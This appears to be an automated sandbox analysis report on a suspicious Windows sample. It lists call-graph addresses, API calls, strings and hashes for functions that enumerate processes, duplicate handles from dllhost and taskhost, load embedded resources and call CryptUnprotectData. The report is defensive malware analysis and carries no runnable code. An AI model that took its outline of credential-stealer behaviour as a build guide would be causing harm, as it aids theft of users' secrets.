43b10f 40181 423330 11 API calls 40086->40181 40088 43b257 40191 4233ae 11 API calls 40088->40191 40092 43b129 40182 4233ae 11 API calls 40092->40182 40093 43b26e 40192 4233ae 11 API calls 40093->40192 40094 43b09a 40094->40086 40179 42cc15 19 API calls 40094->40179 40180 4233ae 11 API calls 40094->40180 40098 43b282 40193 43a87a 164 API calls 40098->40193 40100 43b13c 40183 440f84 12 API calls 40100->40183 40101 43b29d 40194 423330 11 API calls 40101->40194 40104 43b15f 40184 4233ae 11 API calls 40104->40184 40105 43b2af 40107 43b2b8 40105->40107 40108 43b2ce 40105->40108 40195 4233ae 11 API calls 40107->40195 40196 440f84 12 API calls 40108->40196 40111 43b2c9 40198 4233ae 11 API calls 40111->40198 40112 43b2da 40197 42370b memset memcpy memset 40112->40197 40115 43b2f9 40199 423330 11 API calls 40115->40199 40117 43b30b 40200 423330 11 API calls 40117->40200 40119 43b325 40201 423399 11 API calls 40119->40201 40121 43b332 40202 4233ae 11 API calls 40121->40202 40123 43b354 40203 423399 11 API calls 40123->40203 40125 43b364 40204 43a82f 16 API calls 40125->40204 40127 43b370 40205 42db80 164 API calls 40127->40205 40129 43b380 40206 438c4e 164 API calls 40129->40206 40131 43b39e 40207 423399 11 API calls 40131->40207 40133 43b3ae 40208 43a76c 21 API calls 40133->40208 40135 43b3c3 40209 423399 11 API calls 40135->40209 40137->39958 40138->39961 40139->39959 40141 43a6f5 40140->40141 40142 43a765 40140->40142 40141->40142 40229 42a115 40141->40229 40142->39966 40149 4397fd memset 40142->40149 40146 43a73d 40146->40142 40147 42a115 148 API calls 40146->40147 40147->40142 40148->39968 40149->39975 40150->39966 40151->39990 40152->39979 40153->39983 40154->39980 40155->39984 40156->39988 40157->39992 40158->39994 40159->39997 40160->40004 40161->40003 40162->40008 40163->40013 40164->40001 40165->40009 40166->40012 40167->40014 40168->40014 40169->40024 40170->40027 40171->40029 40172->40038 40173->40044 40174->40051 40175->40058 40176->40072 40177->40078 40178->40094 40179->40094 40180->40094 40181->40092 40182->40100 40183->40104 40184->40083 40185->40083 40186->40083 40187->40075 40188->40081 40189->40085 40190->40088 40191->40093 40192->40098 40193->40101 40194->40105 40195->40111 40196->40112 40197->40111 40198->40115 40199->40117 40200->40119 40201->40121 40202->40123 40203->40125 40204->40127 40205->40129 40206->40131 40207->40133 40208->40135 40209->40013 40210->40043 40211->40037 40212->40045 40213->40048 40214->40054 40215->40060 40216->40030 40217->40036 40218->40042 40219->40046 40220->40056 40221->40059 40222->40064 40223->40060 40224->40068 40225->40070 40226->40013 40227->40021 40228->39966 40230 42a175 40229->40230 40232 42a122 40229->40232 40230->40142 40235 42b13b 148 API calls 40230->40235 40232->40230 40233 42a115 148 API calls 40232->40233 40236 43a174 40232->40236 40260 42a0a8 148 API calls 40232->40260 40233->40232 40235->40146 40250 43a196 40236->40250 40251 43a19e 40236->40251 40237 43a306 40237->40250 40276 4388c4 14 API calls 40237->40276 40240 42a115 148 API calls 40240->40251 40241 415a91 memset 40241->40251 40242 43a642 40242->40250 40280 4169a7 11 API calls 40242->40280 40246 43a635 40279 42c02e memset 40246->40279 40250->40232 40251->40237 40251->40240 40251->40241 40251->40250 40261 42ff8c 40251->40261 40269 4165ff 40251->40269 40272 439504 13 API calls 40251->40272 40273 4312d0 148 API calls 40251->40273 40274 42be4c memcpy memcpy memcpy memset memcpy 40251->40274 40275 43a121 11 API calls 40251->40275 40253 43a325 40253->40242 40253->40246 40253->40250 40254 4169a7 11 API calls 40253->40254 40255 42b5b5 memset memcpy 40253->40255 40256 42bf4c 14 API calls 40253->40256 40259 4165ff 11 API calls 40253->40259 40277 42b63e 14 API calls 40253->40277 40278 42bfcf memcpy 40253->40278 40254->40253 40255->40253 40256->40253 40259->40253 40260->40232 40281 43817e 40261->40281 40263 42ff99 40264 42ff9d 40263->40264 40265 42ffe3 40263->40265 40266 42ffd0 40263->40266 40264->40251 40286 4169a7 11 API calls 40265->40286 40285 4169a7 11 API calls 40266->40285 40270 4165a0 11 API calls 40269->40270 40271 41660d 40270->40271 40271->40251 40272->40251 40273->40251 40274->40251 40275->40251 40276->40253 40277->40253 40278->40253 40279->40242 40280->40250 40282 438187 40281->40282 40284 438192 40281->40284 40287 4380f6 40282->40287 40284->40263 40285->40264 40286->40264 40289 43811f 40287->40289 40288 438164 40288->40284 40289->40288 40291 4300e8 3 API calls 40289->40291 40292 437e5e 40289->40292 40291->40289 40315 437d3c 40292->40315 40294 437ea9 40295 437eb3 40294->40295 40300 437f22 40294->40300 40330 41f432 40294->40330 40295->40289 40298 437f06 40378 415c56 11 API calls 40298->40378 40302 437f7f 40300->40302 40303 432d4e 3 API calls 40300->40303 40301 437f95 40379 415c56 11 API calls 40301->40379 40302->40301 40305 43802b 40302->40305 40303->40302 40306 4165ff 11 API calls 40305->40306 40307 438054 40306->40307 40341 437371 40307->40341 40310 43806b 40311 438094 40310->40311 40380 42f50e 139 API calls 40310->40380 40313 437fa3 40311->40313 40314 4300e8 3 API calls 40311->40314 40313->40295 40381 41f638 104 API calls 40313->40381 40314->40313 40316 437d69 40315->40316 40319 437d80 40315->40319 40382 437ccb 11 API calls 40316->40382 40318 437d76 40318->40294 40319->40318 40320 437da3 40319->40320 40323 437d90 40319->40323 40322 438460 134 API calls 40320->40322 40326 437dcb 40322->40326 40323->40318 40386 437ccb 11 API calls 40323->40386 40324 437de8 40385 424f26 123 API calls 40324->40385 40326->40324 40383 444283 13 API calls 40326->40383 40328 437dfc 40384 437ccb 11 API calls 40328->40384 40331 41f54d 40330->40331 40337 41f44f 40330->40337 40332 41f466 40331->40332 40416 41c635 memset memset 40331->40416 40332->40298 40332->40300 40337->40332 40339 41f50b 40337->40339 40387 41f1a5 40337->40387 40412 41c06f memcmp 40337->40412 40413 41f3b1 90 API calls 40337->40413 40414 41f398 86 API calls 40337->40414 40339->40331 40339->40332 40415 41c295 86 API calls 40339->40415 40342 41703f 11 API calls 40341->40342 40343 437399 40342->40343 40344 43739d 40343->40344 40347 4373ac 40343->40347 40418 4446ea 11 API calls 40344->40418 40346 4373a7 40346->40310 40348 416935 16 API calls 40347->40348 40349 4373ca 40348->40349 40351 438460 134 API calls 40349->40351 40355 4251c4 137 API calls 40349->40355 40359 415a91 memset 40349->40359 40362 43758f 40349->40362 40374 437584 40349->40374 40377 437d3c 135 API calls 40349->40377 40417 415308 free 40349->40417 40419 425433 13 API calls 40349->40419 40420 425413 17 API calls 40349->40420 40421 42533e 16 API calls 40349->40421 40422 42538f 16 API calls 40349->40422 40423 42453e 123 API calls 40349->40423 40350 4375bc 40353 415c7d 16 API calls 40350->40353 40351->40349 40354 4375d2 40353->40354 40354->40346 40356 4442e6 11 API calls 40354->40356 40355->40349 40357 4375e2 40356->40357 40357->40346 40426 444283 13 API calls 40357->40426 40359->40349 40424 42453e 123 API calls 40362->40424 40363 4375f4 40368 437620 40363->40368 40369 43760b 40363->40369 40367 43759f 40370 416935 16 API calls 40367->40370 40372 416935 16 API calls 40368->40372 40427 444283 13 API calls 40369->40427 40370->40374 40372->40346 40374->40350 40425 42453e 123 API calls 40374->40425 40375 437612 memcpy 40375->40346 40377->40349 40378->40295 40379->40313 40380->40311 40381->40295 40382->40318 40383->40328 40384->40324 40385->40318 40386->40318 40388 41bc3b 101 API calls 40387->40388 40389 41f1b4 40388->40389 40390 41edad 86 API calls 40389->40390 40397 41f282 40389->40397 40391 41f1cb 40390->40391 40392 41f1f5 memcmp 40391->40392 40393 41f20e 40391->40393 40391->40397 40392->40393 40394 41f21b memcmp 40393->40394 40393->40397 40395 41f326 40394->40395 40398 41f23d 40394->40398 40396 41ee6b 86 API calls 40395->40396 40395->40397 40396->40397 40397->40337 40398->40395 40399 41f28e memcmp 40398->40399 40401 41c8df 56 API calls 40398->40401 40399->40395 40400 41f2a9 40399->40400 40400->40395 40403 41f308 40400->40403 40404 41f2d8 40400->40404 40402 41f269 40401->40402 40402->40395 40405 41f287 40402->40405 40406 41f27a 40402->40406 40403->40395 40410 4446ce 11 API calls 40403->40410 40407 41ee6b 86 API calls 40404->40407 40405->40399 40408 41ee6b 86 API calls 40406->40408 40409 41f2e0 40407->40409 40408->40397 40411 41b1ca memset 40409->40411 40410->40395 40411->40397 40412->40337 40413->40337 40414->40337 40415->40331 40416->40332 40417->40349 40418->40346 40419->40349 40420->40349 40421->40349 40422->40349 40423->40349 40424->40367 40425->40350 40426->40363 40427->40375 40428 441819 40431 430737 40428->40431 40430 441825 40432 430756 40431->40432 40444 43076d 40431->40444 40433 430774 40432->40433 40434 43075f 40432->40434 40446 43034a memcpy 40433->40446 40445 4169a7 11 API calls 40434->40445 40437 4307ce 40439 430819 memset 40437->40439 40440 415b2c 11 API calls 40437->40440 40438 43077e 40438->40437 40442 4307fa 40438->40442 40438->40444 40439->40444 40441 4307e9 40440->40441 40441->40439 40441->40444 40447 4169a7 11 API calls 40442->40447 40444->40430 40445->40444 40446->40438 40447->40444 40448 41493c EnumResourceNamesW 40449 441a5b 40450 441a66 40449->40450 40453 430937 40450->40453 40454 430956 40453->40454 40461 430977 40453->40461 40457 430969 40454->40457 40459 43097e 40454->40459 40454->40461 40456 430a79 40530 4169a7 11 API calls 40457->40530 40459->40461 40462 431a7b 40459->40462 40531 42c02e memset 40461->40531 40463 431aa3 40462->40463 40518 431b2e 40462->40518 40466 43817e 140 API calls 40463->40466 40463->40518 40465 432116 40554 4325ad memset 40465->40554 40468 431ab6 40466->40468 40472 431b15 40468->40472 40468->40518 40536 43041c 12 API calls 40468->40536 40469 432122 40469->40461 40471 431ad5 40473 431b04 40471->40473 40471->40518 40537 42faf4 12 API calls 40471->40537 40474 431baa 40472->40474 40475 431b7c memcmp 40472->40475 40472->40518 40477 42ff8c 140 API calls 40473->40477 40478 431bb0 40474->40478 40479 431bcb 40474->40479 40475->40474 40492 431b95 40475->40492 40477->40472 40539 4169a7 11 API calls 40478->40539 40480 431bd1 40479->40480 40481 431c45 40479->40481 40540 43034a memcpy 40480->40540 40486 4165ff 11 API calls 40481->40486 40485 431bdc 40485->40518 40541 430468 11 API calls 40485->40541 40488 431c65 40486->40488 40490 431cba 40488->40490 40488->40518 40542 42bf4c 14 API calls 40488->40542 40489 431bef 40489->40488 40489->40492 40489->40518 40493 415a91 memset 40490->40493 40492->40518 40538 4169a7 11 API calls 40492->40538 40495 431d17 40493->40495 40494 431ca1 40494->40518 40543 42bfcf memcpy 40494->40543 40497 431d27 memcpy 40495->40497 40495->40518 40504 431da8 40497->40504 40511 431e97 40497->40511 40498 431eb8 40545 4169a7 11 API calls 40498->40545 40499 431f3c 40501 431fc3 40499->40501 40502 431f45 40499->40502 40547 4397fd memset 40501->40547 40532 4172c8 40502->40532 40504->40498 40506 431e12 memcpy 40504->40506 40504->40511 40504->40518 40544 430af5 16 API calls 40504->40544 40505 431fd4 40505->40518 40548 4328e4 12 API calls 40505->40548 40506->40504 40510 431feb 40549 4233ae 11 API calls 40510->40549 40511->40499 40513 431f6a 40511->40513 40513->40518 40546 4169a7 11 API calls 40513->40546 40514 431ffc 40516 43202e 40514->40516 40519 4165ff 11 API calls 40514->40519 40550 42fe8b 22 API calls 40516->40550 40553 42c02e memset 40518->40553 40519->40516 40520 432057 40520->40518 40551 431917 23 API calls 40520->40551 40522 432079 40552 430b5d 11 API calls 40522->40552 40530->40461 40531->40456 40534 4172d6 40532->40534 40533 417302 40533->40518 40534->40533 40555 41715f memset 40534->40555 40536->40471 40537->40473 40538->40518 40539->40518 40540->40485 40541->40489 40542->40494 40543->40490 40544->40504 40545->40518 40546->40518 40547->40505 40548->40510 40549->40514 40550->40520 40551->40522 40553->40465 40554->40469 40555->40533

                                                            Executed Functions

                                                            Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DDAD
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                            • memset.MSVCRT ref: 0040DF5F
                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                            • API String ID: 708747863-3398334509
                                                            • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                            • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                            Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 830 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 833 413f00-413f11 Process32NextW 830->833 834 413da5-413ded OpenProcess 833->834 835 413f17-413f24 CloseHandle 833->835 836 413eb0-413eb5 834->836 837 413df3-413e26 memset call 413f27 834->837 836->833 839 413eb7-413ebd 836->839 845 413e79-413e9d call 413959 call 413ca4 837->845 846 413e28-413e35 837->846 841 413ec8-413eda call 4099f4 839->841 842 413ebf-413ec6 free 839->842 843 413edb-413ee2 841->843 842->843 850 413ee4 843->850 851 413ee7-413efe 843->851 857 413ea2-413eae CloseHandle 845->857 848 413e61-413e68 846->848 849 413e37-413e44 GetModuleHandleW 846->849 848->845 854 413e6a-413e76 848->854 849->848 853 413e46-413e5c GetProcAddress 849->853 850->851 851->833 853->848 854->845 857->836
                                                            APIs
                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                            • memset.MSVCRT ref: 00413D7F
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                            • memset.MSVCRT ref: 00413E07
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                            • free.MSVCRT ref: 00413EC1
                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                            • API String ID: 1344430650-1740548384
                                                            • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                            • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                            Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 949 40b58d-40b59e 950 40b5a4-40b5c0 GetModuleHandleW FindResourceW 949->950 951 40b62e-40b632 949->951 952 40b5c2-40b5ce LoadResource 950->952 953 40b5e7 950->953 952->953 954 40b5d0-40b5e5 SizeofResource LockResource 952->954 955 40b5e9-40b5eb 953->955 954->955 955->951 956 40b5ed-40b5ef 955->956 956->951 957 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 956->957 957->951
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                            • String ID: AE$BIN
                                                            • API String ID: 1668488027-3931574542
                                                            • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                            • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                            • free.MSVCRT ref: 00418803
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                            • String ID:
                                                            • API String ID: 1355100292-0
                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                            Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 767404330-0
                                                            • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                            • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                            Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileFind$FirstNext
                                                            • String ID:
                                                            • API String ID: 1690352074-0
                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0041898C
                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: InfoSystemmemset
                                                            • String ID:
                                                            • API String ID: 3558857096-0
                                                            • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
